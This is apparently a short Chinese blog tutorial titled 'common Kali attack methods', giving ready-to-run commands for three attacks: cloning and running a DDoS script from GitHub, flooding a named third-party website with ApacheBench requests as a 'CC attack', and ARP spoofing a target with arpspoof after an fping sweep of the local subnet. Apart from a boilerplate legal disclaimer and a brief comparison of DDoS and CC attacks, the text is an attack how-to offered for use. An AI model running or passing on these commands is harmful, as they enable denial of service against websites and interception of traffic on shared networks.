Kali常见攻击手段
注意:仅用于教程和科普,切勿做违法之事,否则后果自负
1 网络攻击手段
请正确使用DDos和CC攻击,不要用来做违反当地法律法规的事情,否则后果自负
使用之前kali需要能够上网
参考:kali安装
1.1 DDos攻击
打开命令行,下载对应ddos数据包
git clone https://github.com/Andysun06/ddos
1
进入数据包对应的文件夹(区分大小写)
cd ddos
1
执行脚本
本文用于演示的kali是2020年版本,用python执行ddos-p2.py,输入命令:
python ddos-p2.py
二 cc
ab -n 参数1 -c 参数2 网站地址
参数一是并发数(请求的用户量)
参数二是发送总量(请求的总次数)
(有兴趣的可以在百度上另外学习)
参数1,参数2和网站地址由自己设置,这里以 1000,1000,http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例:
出现如下界面表示攻击成功:
DDos与CC攻击区别:
1,CC攻击(流量不大,真实IP)
通常是应用层攻击,攻击对象是网页,涉及的协议主要是HTTP,HTTPS,消耗的是服务器的CPU资源(通过请求大量调用CPU的资源,例如查询数据库)
2,DDOS攻击(流量很大,伪造IP)
通常是网络层和传输层,攻击对象是IP,涉及协议主要是IP,UDP和TCP,通常消耗的是网络带宽
三arp欺骗
apt-get install dsniff -y
ifconfig例如我的IP是192.168.145.98,命令就是fping -g 192.168.145.98/24
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
